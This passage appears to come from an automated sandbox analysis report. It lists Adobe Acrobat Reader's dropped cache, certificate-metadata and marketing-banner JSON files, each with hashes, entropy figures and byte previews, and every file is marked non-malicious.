Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.752969867432539
Encrypted:	false
SSDEEP:	3:kkFklk5eSkfllXlE/HT8kSzlXNNX8RolJuRdxLlGB9lQRYwpDdt:kK95e2T8v7NMa8RdWBwRd
MD5:	93C4B92B4B46995C7030ACDAEB5CC726
SHA1:	229E3534900F8B694DD6E0C6833797AA817DDE5D
SHA-256:	9D17751F3720C93CD1765C4185DEABD43E111D85A3D67B9B5EEEBB139F5A9704
SHA-512:	E3734CDD49E47C53FBCB13F9365F22B219DEB7E924938A0BEC97EE2969AD7933DE75390FC11D263CDEAA464776F13E913BD3CECC9B542C60D7DC68B369CCC145
Malicious:	false
Preview:	p...... ...........r7U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.226293701622254
Encrypted:	false
SSDEEP:	6:kKBi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:vDImsLNkPlE99SNxAhUe/3
MD5:	ACA30E2E8EB1EE49284312D5F1190FB8
SHA1:	DA48C97D90351A9CF0F747E217E7FD31808065C6
SHA-256:	5D622D5DFEDCC281350B2784261219D8A55521C0B33320A4165FCDFA3ADFC992
SHA-512:	C52419ADCC435EAD3C60A82BDA1EA3A1457565A036E956F5790C6A7AD5E63954DDAC75932F11AE40B8A8EEFDC8843F214F1F52323FD2D7EAF3FB5318E09B1BA3
Malicious:	false
Preview:	p...... ...........t7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.33345728712073
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJM3g98kUwPeUkwRe9:YvXKX+lIM1UYpW7PZGMbLUkee9
MD5:	A07A987060B8553FA1797831BE445923
SHA1:	3C97D45F500B4647C66C99DAB0FA230D61D20D4E
SHA-256:	2F8101F2811FD61D50DD76D30C7DD10EC211730C8A8458DF05BEA047048BFADB
SHA-512:	90E357B992DFFD9CE6A2C39A5B8349591EF86322583F184EF21CFB5D5B64E3682760AC1588B4B2B93D44E2351A9530C75975C18E1AFA216198E073E5DEBE8F05
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.2688417210468685
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfBoTfXpnrPeUkwRe9:YvXKX+lIM1UYpW7PZGWTfXcUkee9
MD5:	6711A0C1670E8744F55F87DCAA972BED
SHA1:	1AA04C867BBFCFBC27D76EDEF80E1C9B1D54F8DD
SHA-256:	89FD9D31C2E3C32F52C9C6CD2BA1CD7E502A2CF67381BD0C73F505DE3E50B38F
SHA-512:	B3315C54D9BD07D5515C2141A9AC98B781628E16B9B23CE46F998961D5F04171BE1564037CAFFD6C6D71BE6F9FF958BFE778804DE83282FC10D29D85A818F4B7
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.248109514961539
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfBD2G6UpnrPeUkwRe9:YvXKX+lIM1UYpW7PZGR22cUkee9
MD5:	7BB0EA038507CD4C39FF4A18C7CA2A1E
SHA1:	878C0191C6B4B9222F09F0267D6D7F9300195064
SHA-256:	AB03450810C070D9E627AD7D2574BFE0914B33A4A8A1CD469A06745E91ADB7C7
SHA-512:	19A1EF192698419B66BF887DFAD408D7792D3C4F2F7A9FBD61F07EA8B8E01C13F7E2AADCC509E32E7490E0BD92A3C1A56641EA4465421CCA308503FD9942DC64
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.311300827960755
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfPmwrPeUkwRe9:YvXKX+lIM1UYpW7PZGH56Ukee9
MD5:	E0EB9F30A616158657FCD8F7C77E2F3E
SHA1:	359A7EC12A243FADB7636F34351DDAF331149C26
SHA-256:	8B200B953F40C0CF98EC29056E685CECE40B68B14EC7F4DC859EAA8388126A64
SHA-512:	5DC398EE9027235B1C185C7F793720DE402D758788EF91AACDD4182E0E1DAD8BD2420BB09754E7A512512BFD040D39485BA38E04D98B3EF89C29A0DE43DD2159
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.687721305319971
Encrypted:	false
SSDEEP:	24:Yv6X+lx1FiP+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSGl:YvNrSGhgy6SAFv5Ah8cv/q
MD5:	26995C00E26619BDE83DFD51032F9B5E
SHA1:	4566D664F5ED88544AE7115ADD61006B6DB17E86
SHA-256:	4E0D6705EFA91B72D5E352E2B9FEDDE2217D16DF7688AB635C9A4537D50914CF
SHA-512:	10ACCE8D9270D6805C6121879992077610697793C44CCF032DFE0A634E3CBCFFE25F8BF6EDACBC100C7B59C5721D913B38ACEC1B903D9DCFA486A974E31157F4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.25653855003184
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJf8dPeUkwRe9:YvXKX+lIM1UYpW7PZGU8Ukee9
MD5:	2F8DF28F363749CAE126856A2856A1D7
SHA1:	C987B8281DBB2D5A4E45EA4901DC86D9EAB3CC07
SHA-256:	F9B0636868EADF53BE33ED06CB4CA868DFC0CE070565E30CFABA0B7678F1CA25
SHA-512:	C24E1BDF2102C1E836F554B6A42667F3B09A6BAA8B2D009EF711A20785B98B914D2B2663DF7F0C36B0E73FB2FB847F38C349913993F6F6E860EE609F0CD9D5ED
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.257683844467374
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfQ1rPeUkwRe9:YvXKX+lIM1UYpW7PZGY16Ukee9
MD5:	C3B6F4EDABED24E21F0E2A903B4A7515
SHA1:	621A7988DFA8980F7C78B6021C770ABDB3BCB1EA
SHA-256:	4CB55A5433149FA21E8184280E8992D53F9783030AEFCED7735E507066D011B1
SHA-512:	F83C03FFC780AFFE4A42FDF781112932426C04626A63F723E545C78F4C679D8F4FE5E84E4A88CBDFB1C3C86ADB2B2537F11EBEAA7B2598AB4246424C46A942C0
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.277560741175454
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfFldPeUkwRe9:YvXKX+lIM1UYpW7PZGz8Ukee9
MD5:	9FC2D5F8BC2FCEEA7786EB3A75E38668
SHA1:	FE8F2A71B98FDB231C7CED60759FD8BB4E045B01
SHA-256:	DAB6997AE1423EFE5C3C2078369947FD5411541B28C9B8E7B0C22516C5A1311C
SHA-512:	09A8B55B80AB3DF56BEF5332532B7166ED46FFE7886DC23A4F2D50F8A77900518F6C53D368F3E249BC8B792B61672357561FEAE1CC880989DE7B574F85BAACE3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.283827244682039
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfzdPeUkwRe9:YvXKX+lIM1UYpW7PZGb8Ukee9
MD5:	EABC19D87CD88006717AFB875EB61635
SHA1:	D24FBEC0CB2C27A462BD9AB17459A1F1F27A355A
SHA-256:	DBE33B19C697CFAC1A7CF497DD4CBC048B3DB46CECB967AB1D4B3265E2CF9D33
SHA-512:	D1C537A7DD424120A7DC12C4DBF40ACB845F505D14341C7CFA459F4C50E27044E34FE1B3AE53F03388005A7C8F7914C0ECCAB46A573537D88847149685F9EC65
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.263733208018288
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfYdPeUkwRe9:YvXKX+lIM1UYpW7PZGg8Ukee9
MD5:	DF97776F505980EC70CBA415B5E780E4
SHA1:	7978840122238FB6687B0B8A5356FF01D63624A0
SHA-256:	E007E9A7FBF1E2C3F68662D22511E63D55EAF1906033D630F56F5AEA9366B2D2
SHA-512:	D9D5235B9411D4EAB97AB4CB7481A39560C097D83AC8AB5877D7E1B4C83E4740CB1A33F174D10AA9A5789CC46199F49E37BA71093F2FAD8A8695BEB3CB6B2A3D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.249726434602789
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJf+dPeUkwRe9:YvXKX+lIM1UYpW7PZG28Ukee9
MD5:	9D24C76B4ECDA2CA7B73E3C5F5709CFA
SHA1:	442FE46644D9410C0D608BD6FE961140684F55BD
SHA-256:	B73A7935390F987FF29028B510C9F1407CFF4764D387125B79F4E60D248E8E0A
SHA-512:	88A7B49DE860DA743E505806A1E018910AE72B88A6D41C90304CCDFBD577E9128478E6D12778F2C50D676900205BB0E0FFE14CDB82BEEF29B8AB0D0861AD59F6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.2475295619944315
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfbPtdPeUkwRe9:YvXKX+lIM1UYpW7PZGDV8Ukee9
MD5:	0660B09A3A2C39A47A5399B9AD23556F
SHA1:	9E7E30C3E2DAD0817565CD0F5E538D616B61450C
SHA-256:	E32F158CD36452A854A7E4A3D85DF7281233CC4A517962C116823B86EE935C1C
SHA-512:	76346C7A299AE91FFFABDE58A5C1C4AA9D31B39A063A071F0FB510AF4F5C0A1866817EA3F757A1F677753B6130BA24A3646215C8A88FFA14ACC451FFA354D14F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.248700794717795
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJf21rPeUkwRe9:YvXKX+lIM1UYpW7PZG+16Ukee9
MD5:	48BD44F864B6DF3D4FDA9F52C63C6EEF
SHA1:	B0805877A885130117D9FA3B130010AD30E266E8
SHA-256:	66D42F39B2F04D85A8FF4D72F419BD9EBECF70C1E3C7029AFE1DE23FC22D5261
SHA-512:	AB917C870623BD9AB7AC19D1B2587C6A9B277B369F202D5C432AF9292E843B4DF5F3D48C1694A32E57EBFF42BC5E3B29CDE4929EF8A60E0F9D12E8E85C7C3E9E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.660502582886618
Encrypted:	false
SSDEEP:	24:Yv6X+lx1FiPiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGl:YvNrSUBgkDMUJUAh8cvMq
MD5:	D11A7539CB9820D662698183215E945E
SHA1:	A0D18A89CC0A1E67D1543E68ED5D2DBDEBAA56EC
SHA-256:	2A0FFBD7DCC8C792761CE540F027A7A436D5C518578ADB226A23592ABA8B8409
SHA-512:	6B3DE62467E9FB01636870520F5AFB5EBB7B65FBE3BD5AB452F5CADA5752DE26CDDA227D3CE53F1EB406E41B94ED1B1FA4B8DBAED3839DABE0B856779024281E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.224484424786322
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJfshHHrPeUkwRe9:YvXKX+lIM1UYpW7PZGUUUkee9
MD5:	157D8721440D155970E422265ACAEDD0
SHA1:	6692C8597BAD3418AB967AEB333F4ED9E252083B
SHA-256:	D9621BBC2AB9E04BB86119A8F09ED27F33AF748D37383A9F8062D960BD245A4A
SHA-512:	52409BE6BC0F51C8891B02403F0754B7C94D1CE2CB131C293FEC223142483738AECC24DA3D7CE2A4F5ED02C7F4EDDA678169B40506D5ABDBDD103AEFE559E997
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.242399998887142
Encrypted:	false
SSDEEP:	6:YEQXJ2HX+WQVILLSr1x+FIbRI6XVW7+0YOQkqoAvJTqgFCrPeUkwRe9:YvXKX+lIM1UYpW7PZGTq16Ukee9
MD5:	A3CC8CB292AD7A967FED678DDFB431B2
SHA1:	58B3446E8C498E3BA3ADD665384745E789C7292A
SHA-256:	87A66B5D6A7CD74F3BA4431FA0DC99C94D11CB9147557860676DC7C5AC051B2C
SHA-512:	C7D70546409CD6A4104CD54B7E5CE43F9953C15820691CA416A5B62A36B0278A998EC75F97BD6F066B7D028D8066C916B167EE6DE89C211AF2F310DF99B1BD58
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"34f4355e-147e-446e-969a-fc3ad76f766f","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735132538169,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.138853476733896
Encrypted:	false
SSDEEP:	24:YDcYoaz7may3Qot84PPjM+ETc2OYPkYCKRLFjHVCj0SRdyKEI2G2LSRPP53Chswu:YDjOm2Kz1UtrvPptX+EAe95Iy
MD5:	F218F6A5400BDD77A94C14834FE32FE3
SHA1:	F59B04D3FF0717A16A82F2083507656918C5A5EA
SHA-256:	4D5B6422890DA416AE088A77D0216C631C1FFCAE927CDD2E4E9C10A42E0F5B69
SHA-512:	4C6C8F7A5C24743E1DA287537CCF22E70BC6760B4D6A3A6B41D84504AC35590E10ABE19BB4EC96A517DE6C97FB1C6F1056D3D117EE16B3848CDE44ECC067FBB8
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e4ae1c7729f27fd44f892cbc01c1f30b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734957457000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"50fa4d4063a80b5511acce1009573361","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734957457000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"049ccafc3f0c97ef385a51c590d43b9f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734957457000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2a8a137c750ac64e3b7e44bc3588b893","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734957457000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"c9d597d6916a1ee09d12b708f105cdda","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734957457000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"34b8786b493a9e1911ba236267a4fd31","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.9857228271258511
Encrypted:	false
